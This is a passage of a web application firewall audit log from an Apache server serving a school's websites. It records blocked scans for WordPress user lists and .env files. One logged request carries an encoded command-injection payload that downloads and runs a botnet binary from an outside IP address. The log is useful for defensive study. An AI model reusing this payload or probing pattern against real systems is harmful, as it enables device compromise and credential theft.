"%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749995606964118 790 (- - -) Stopwatch2: 1749995606964118 790; combined=330, p1=292, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e0e094a-Z-- --39a15443-A-- [15/Jun/2025:21:11:24 +0700] aE7UjLr7GPil_2h-MzY1cgAAANA 103.236.140.4 33888 103.236.140.4 8181 --39a15443-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 167.235.8.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 167.235.8.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --39a15443-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39a15443-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749996684554561 3117 (- - -) Stopwatch2: 1749996684554561 3117; combined=1348, p1=449, p2=871, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39a15443-Z-- --81706b0a-A-- [15/Jun/2025:21:39:26 +0700] aE7bHrr7GPil_2h-MzY1ngAAAM4 103.236.140.4 34088 103.236.140.4 8181 --81706b0a-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.150%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 144.172.116.95 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.172.116.95 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 --81706b0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81706b0a-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749998366029262 1024 (- - -) Stopwatch2: 1749998366029262 1024; combined=431, p1=378, p2=0, p3=0, p4=0, p5=53, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81706b0a-Z-- --b185de1f-A-- [15/Jun/2025:21:50:54 +0700] aE7dzj2YoubFl106kA3_BwAAAIY 103.236.140.4 34180 103.236.140.4 8181 --b185de1f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.155 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.155 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --b185de1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b185de1f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749999054044857 850 (- - -) Stopwatch2: 1749999054044857 850; combined=372, p1=335, p2=0, p3=0, p4=0, p5=37, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b185de1f-Z-- --7ecdc47c-A-- [15/Jun/2025:21:50:57 +0700] aE7d0br7GPil_2h-MzY1rgAAANU 103.236.140.4 34182 103.236.140.4 8181 --7ecdc47c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.155 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.155 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --7ecdc47c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ecdc47c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749999057086507 689 (- - -) Stopwatch2: 1749999057086507 689; combined=281, p1=251, p2=0, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ecdc47c-Z-- --ecb7247c-A-- [15/Jun/2025:22:08:35 +0700] aE7h87r7GPil_2h-MzY1zgAAANE 103.236.140.4 34318 103.236.140.4 8181 --ecb7247c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.214.112.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.214.112.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ecb7247c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecb7247c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750000115560577 2703 (- - -) Stopwatch2: 1750000115560577 2703; combined=1256, p1=423, p2=803, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecb7247c-Z-- --8d5b6c3d-A-- [15/Jun/2025:22:36:02 +0700] aE7oYrr7GPil_2h-MzY18QAAANA 103.236.140.4 34510 103.236.140.4 8181 --8d5b6c3d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.213.155.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.213.155.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: */* Accept-Language: en-US,en;q=0.5 --8d5b6c3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d5b6c3d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750001762406935 4083 (- - -) Stopwatch2: 1750001762406935 4083; combined=1817, p1=530, p2=1235, p3=0, p4=0, p5=51, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d5b6c3d-Z-- --10acfc4f-A-- [15/Jun/2025:22:46:19 +0700] aE7qy7r7GPil_2h-MzY1_QAAAMc 103.236.140.4 34574 103.236.140.4 8181 --10acfc4f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 169.255.137.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 169.255.137.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --10acfc4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10acfc4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750002379816409 3575 (- - -) Stopwatch2: 1750002379816409 3575; combined=1484, p1=487, p2=965, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10acfc4f-Z-- --27f4736a-A-- [15/Jun/2025:22:55:45 +0700] aE7tAYZIfYpKBvn-jB75-QAAAFU 103.236.140.4 34618 103.236.140.4 8181 --27f4736a-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 97.133.58.32 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 97.133.58.32 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: */* --27f4736a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27f4736a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750002945410989 920 (- - -) Stopwatch2: 1750002945410989 920; combined=337, p1=292, p2=0, p3=0, p4=0, p5=45, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27f4736a-Z-- --eee14466-A-- [15/Jun/2025:22:57:59 +0700] aE7thz2YoubFl106kA3_MAAAAI0 103.236.140.4 34624 103.236.140.4 8181 --eee14466-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.212.153.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.212.153.102 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --eee14466-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eee14466-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750003079912961 3385 (- - -) Stopwatch2: 1750003079912961 3385; combined=1475, p1=518, p2=923, p3=0, p4=0, p5=34, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eee14466-Z-- --39276e4d-A-- [15/Jun/2025:23:06:39 +0700] aE7vjz2YoubFl106kA3_NQAAAIA 103.236.140.4 34676 103.236.140.4 8181 --39276e4d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.27.227.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.27.227.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --39276e4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39276e4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750003599120531 2394 (- - -) Stopwatch2: 1750003599120531 2394; combined=1165, p1=415, p2=724, p3=0, p4=0, p5=26, sr=145, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39276e4d-Z-- --f1cc1634-A-- [15/Jun/2025:23:16:25 +0700] aE7x2br7GPil_2h-MzY2BwAAANg 103.236.140.4 34722 103.236.140.4 8181 --f1cc1634-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.92.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.92.83 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --f1cc1634-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1cc1634-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750004185191294 916 (- - -) Stopwatch2: 1750004185191294 916; combined=333, p1=291, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1cc1634-Z-- --a2eed360-A-- [15/Jun/2025:23:21:00 +0700] aE7y7Lr7GPil_2h-MzY2CwAAAMU 103.236.140.4 34754 103.236.140.4 8181 --a2eed360-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 104.248.78.73 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 104.248.78.73 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --a2eed360-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2eed360-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750004460394954 19733 (- - -) Stopwatch2: 1750004460394954 19733; combined=37261, p1=383, p2=0, p3=0, p4=0, p5=18459, sr=118, sw=0, l=0, gc=18419 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2eed360-Z-- --25bca027-A-- [15/Jun/2025:23:38:30 +0700] aE73Bj2YoubFl106kA3_RwAAAIk 103.236.140.4 34806 103.236.140.4 8181 --25bca027-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.92.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.92.83 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --25bca027-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25bca027-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750005510662916 951 (- - -) Stopwatch2: 1750005510662916 951; combined=439, p1=397, p2=0, p3=0, p4=0, p5=42, sr=168, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25bca027-Z-- --86a1d62a-A-- [16/Jun/2025:00:08:50 +0700] aE7-Ij2YoubFl106kA3_UQAAAIM 103.236.140.4 34916 103.236.140.4 8181 --86a1d62a-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 129.222.37.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 129.222.37.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept: */* --86a1d62a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86a1d62a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750007330808639 923 (- - -) Stopwatch2: 1750007330808639 923; combined=350, p1=308, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86a1d62a-Z-- --cbbcd805-A-- [16/Jun/2025:00:42:50 +0700] aE8GGrr7GPil_2h-MzY4mwAAAMY 103.236.140.4 44260 103.236.140.4 8181 --cbbcd805-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.92.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.92.83 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --cbbcd805-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbbcd805-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750009370531558 882 (- - -) Stopwatch2: 1750009370531558 882; combined=366, p1=311, p2=0, p3=0, p4=0, p5=55, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbbcd805-Z-- --4219821e-A-- [16/Jun/2025:00:52:06 +0700] aE8IRrr7GPil_2h-MzY6MAAAAMM 103.236.140.4 47194 103.236.140.4 8181 --4219821e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.241.104.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.241.104.207 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4219821e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4219821e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750009926031186 3128 (- - -) Stopwatch2: 1750009926031186 3128; combined=1373, p1=467, p2=875, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4219821e-Z-- --70ad7a14-A-- [16/Jun/2025:01:16:01 +0700] aE8N4br7GPil_2h-MzY9QAAAAM4 103.236.140.4 55360 103.236.140.4 8181 --70ad7a14-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.84.107.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.84.107.128 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --70ad7a14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70ad7a14-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750011361668582 2875 (- - -) Stopwatch2: 1750011361668582 2875; combined=1316, p1=423, p2=858, p3=0, p4=0, p5=34, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70ad7a14-Z-- --97c01e2a-A-- [16/Jun/2025:01:34:43 +0700] aE8SQ7r7GPil_2h-MzY-3wAAAM8 103.236.140.4 33002 103.236.140.4 8181 --97c01e2a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.92.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.92.83 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --97c01e2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97c01e2a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750012483535755 891 (- - -) Stopwatch2: 1750012483535755 891; combined=368, p1=304, p2=0, p3=0, p4=0, p5=64, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97c01e2a-Z-- --30404740-A-- [16/Jun/2025:01:35:23 +0700] aE8Sa_GguMGNwgSGIMxYYAAAAAM 103.236.140.4 33230 103.236.140.4 8181 --30404740-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 156.146.36.87 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 156.146.36.87 